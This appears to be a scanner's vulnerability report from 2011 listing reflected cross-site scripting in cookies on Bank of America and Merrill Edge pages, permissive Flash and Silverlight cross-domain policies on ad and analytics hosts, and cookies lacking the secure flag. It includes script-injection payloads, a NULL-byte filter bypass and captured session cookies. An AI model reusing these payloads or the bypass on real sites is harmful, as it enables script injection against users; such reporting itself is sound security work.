The value of the ar_s_p81479006 cookie is copied into the HTML document as plain text between tags. The payload b0db8<script>alert(1)</script>b0d978f9552 was submitted in the ar_s_p81479006 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the __stid cookie is copied into the HTML document as plain text between tags. The payload 21b12<script>alert(1)</script>d71cda52c54 was submitted in the __stid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /getSegment.php?purl=http%3A%2F%2Fwww.tenable.com%2Fservices%2Fnessus-perimeter-service%3Fgclid%3DCNLb8cPsuKgCFQbe4AodEirYCA&jsref=&rnd=1303775074503 HTTP/1.1 Host: seg.sharethis.com Proxy-Connection: keep-alive Referer: http://www.tenable.com/services/nessus-perimeter-service?gclid=CNLb8cPsuKgCFQbe4AodEirYCA User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __stid=CspT702sdV9LL0aNgCmJAg==21b12<script>alert(1)</script>d71cda52c54; __switchTo5x=64; __utmz=79367510.1303478681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=8f891fa-12f7d623a1f-609dccbc-23; __utma=79367510.1475296623.1303478681.1303478681.1303478681.1
Response
HTTP/1.1 200 OK Server: nginx/0.8.47 Date: Mon, 25 Apr 2011 23:45:21 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.3 P3P: "policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM" Content-Length: 1368
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-type" content="text/html;charset=UTF-8">
The value of the state cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d7fa"><script>alert(1)</script>c094ae10236 was submitted in the state cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 404 Not found Server: Sun-ONE-Web-Server/6.1 Date: Tue, 26 Apr 2011 12:27:56 GMT Content-type: text/html P3p: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Content-Length: 13458
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en"> <head> <meta http-equiv="content-type" content="text/html; charset=iso-8859-1"> <meta name="Description" content="Plea ...[SNIP]... <a href="http://www.bankofamerica.com/contact/?state=MA4d7fa"><script>alert(1)</script>c094ae10236"> ...[SNIP]...
The value of the state cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f662a'%3balert(1)//d027475f5ab was submitted in the state cookie. This input was echoed as f662a';alert(1)//d027475f5ab in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /privacy HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464<i=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MAf662a'%3balert(1)//d027475f5ab; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;
The value of the state cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1881f'%3balert(1)//dd2288e8694 was submitted in the state cookie. This input was echoed as 1881f';alert(1)//dd2288e8694 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /privacy/Control.do HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464<i=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA1881f'%3balert(1)//dd2288e8694; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;
The value of the state cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 789a0'%3balert(1)//ac10ab97be4 was submitted in the state cookie. This input was echoed as 789a0';alert(1)//ac10ab97be4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /privacy/index.jsp HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464<i=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA789a0'%3balert(1)//ac10ab97be4; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;
The value of the BOA_0020 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef664'%3balert(1)//3ee65bef365 was submitted in the BOA_0020 cookie. This input was echoed as ef664';alert(1)//3ee65bef365 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /smallbusiness/index.jsp HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464<i=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1ef664'%3balert(1)//3ee65bef365; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;
The value of the state cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cdd35'%3balert(1)//09d60cf68b2 was submitted in the state cookie. This input was echoed as cdd35';alert(1)//09d60cf68b2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /smallbusiness/index.jsp HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464<i=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MAcdd35'%3balert(1)//09d60cf68b2; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;
4.70. https://www.merrilledge.com/m/pages/global-oao.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.merrilledge.com
Path:
/m/pages/global-oao.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %007eae9"><script>alert(1)</script>d210b1fb8d3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7eae9"><script>alert(1)</script>d210b1fb8d3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /m/pages/global-oao.aspx?%007eae9"><script>alert(1)</script>d210b1fb8d3=1 HTTP/1.1 Host: www.merrilledge.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SMIDENTITY=0W34VN9dA9bWGxNH7Zo+wNB4BqhgfwgC/V3SS6QoRVIhpR3iFFqiPEtEy5Vg60B4eA74F0BCLpV6OvE72yrh6+55CW/ai7RnuZGDEpHwvqDe8sRPkCBbEb0l/YGIxk6PrZhVLIoYebn0XY3xMclg+G08+dUO8bhtR0OiIYjoM0++rS7ZOJ/UaaFpw0KtXh6K+2AU8+inyYPyOlBsNy2LbHjpwP50nhqcqqBAIUQ/OhxApBnqmCLnCTSes9vjk4hHDVrhjbXDoPLoISGQqisUzc6TBefD5Q9m4GnifxAiXCyr2xfWKeoDmM//AH+0MV7lybo5N/sihQV4ohsXxYN1J8PCK7RVgHPvhsxGkbmcXf/fRxt0k0zaGW7H8xTY7bFLulvcm1wXA8II0K3qcgsXox5uljKP60/lrQ/iD+Y+VOJAN4phstGAi5uH1rku+/Jz4DeUUSYO3fBMcYMUCguwWF6Tpm5rWb9ogQfkSWUlXd1PKvu/YtQcdoj/0yQueC7l6fbkCSjrjU+TBskdUgQaLWGR6v9BYYwx6I+r6kEdusGSd0Toh8QeOVM8QmpAfl/vpcow5jjnqSi4WCWrtMkZOqeiDWBEhbMZ5EVgOoJJiV0xNFM9qwN4bJ8PgOrbFotT; pxs=53e1d1d2ef5543dabbbb6e0d12a34f8b; pxv=C22A32BD-4241-4EE4-951A-6B07D6D8E16E
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: 109.xg4ken.com
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: ad.doubleclick.net
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: afreshbunch.com
Response
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Tue, 23 Jun 2009 16:55:37 GMT Accept-Ranges: bytes ETag: "659d66e23f4c91:0" Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 26 Apr 2011 01:03:11 GMT Connection: close Content-Length: 223
<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific subdomains.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: bridgefront.com
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 01:24:01 GMT Server: Apache/2.2.3 (CentOS) Last-Modified: Mon, 22 Feb 2010 20:31:09 GMT ETag: "2f20014-1d1-5033bd40" Accept-Ranges: bytes Content-Length: 465 Connection: close Content-Type: text/xml
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: data.cmcore.com
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 12:26:01 GMT Server: Apache P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA" Last-Modified: Thu, 06 Dec 2007 22:23:27 GMT ETag: "1fccb-c7-4758765f" Accept-Ranges: bytes Content-Length: 199 Keep-Alive: timeout=300, max=972 Connection: Keep-Alive Content-Type: application/xml
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: data.coremetrics.com
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 12:26:05 GMT Server: Apache P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA" Last-Modified: Thu, 06 Dec 2007 22:23:27 GMT ETag: "23c142-c7-4758765f" Accept-Ranges: bytes Content-Length: 199 Keep-Alive: timeout=300, max=999 Connection: Keep-Alive Content-Type: application/xml
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: firstdata.122.2o7.net
Response
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 23:46:30 GMT Server: Omniture DC/2.0.0 xserver: www343 Connection: close Content-Type: text/html
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: fls.doubleclick.net
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: now.eloqua.com
Response
HTTP/1.1 200 OK Cache-Control: max-age=0 Content-Type: text/xml Last-Modified: Tue, 26 May 2009 19:46:00 GMT Accept-Ranges: bytes ETag: "04c37983adec91:0" Server: Microsoft-IIS/7.5 P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA", X-Powered-By: ASP.NET Date: Mon, 25 Apr 2011 23:46:28 GMT Connection: keep-alive Content-Length: 206
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: pixel.quantserve.com
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: servedby.flashtalking.com
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: shots-s.snap.com
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: shots.snap.com
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: sofa.bankofamerica.com
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 12:26:03 GMT Server: Apache P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA" Last-Modified: Thu, 06 Dec 2007 22:23:27 GMT ETag: "204760-c7-4758765f" Accept-Ranges: bytes Content-Length: 199 Keep-Alive: timeout=300, max=995 Connection: Keep-Alive Content-Type: application/xml
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: tc.bankofamerica.com
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: tc.bankofamerica.com
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.afreshbunch.com
Response
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Tue, 23 Jun 2009 16:55:37 GMT Accept-Ranges: bytes ETag: "659d66e23f4c91:0" Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 26 Apr 2011 00:44:00 GMT Connection: close Content-Length: 223
<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: realestatecenter.bankofamerica.com
Response
HTTP/1.1 200 OK Cache-Control: max-age=86400 Content-Length: 1546 Content-Type: text/xml Last-Modified: Wed, 13 Apr 2011 20:18:40 GMT Accept-Ranges: bytes ETag: "e960c3fa17facb1:0" Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMo TAIo OUR STP COM INT STA PRE" X-Powered-By: ASP.NET Date: Tue, 26 Apr 2011 12:44:49 GMT Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Request
GET /crossdomain.xml HTTP/1.0 Host: secure.opinionlab.com
The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: stats.wordpress.com
Response
HTTP/1.1 200 OK Server: nginx Date: Tue, 26 Apr 2011 01:20:51 GMT Content-Type: text/xml Connection: close Accept-Ranges: bytes ETag: "249-4c227139-3be9c0" Last-Modified: Wed, 23 Jun 2010 20:40:25 GMT Content-Length: 585
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: ad.doubleclick.net
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: firstdata.122.2o7.net
Response
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 23:46:30 GMT Server: Omniture DC/2.0.0 xserver: www389 Connection: close Content-Type: text/html
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: stats.wordpress.com
<HEAD><TITLE>403: Access Forbidden</TITLE></HEAD> <BODY><FONT COLOR="#CC0000"><b>Due to the presence of characters known to be used in Cross Site Scripting attacks, access is forbidden. This web site ...[SNIP]...
9. SSL cookie without secure flag setpreviousnext There are 43 instances of this issue:
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /signup.php HTTP/1.1 Host: account.snap.com Connection: keep-alive Referer: http://www.snap.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots%26call%3D1%26time%3D1303780536; __utma=241625280.1756088163.1303782451.1303782451.1303782451.1; __utmb=241625280; __utmc=241625280; __utmz=241625280.1303782451.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); session=id%3D55022ba0e047fea09f979fd4570d39f9%26time%3D1303782563%26created_time%3D1303782435
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /PostLead.aspx HTTP/1.1 Host: landingpage.leads.dynamicssite.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: secure.opinionlab.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ccc01/comment_card_d.asp HTTP/1.1 Host: secure.opinionlab.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ccc01/comment_card_json_4_0_b.asp HTTP/1.1 Host: secure.opinionlab.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following cookie was issued by the application and does not have the secure flag set:
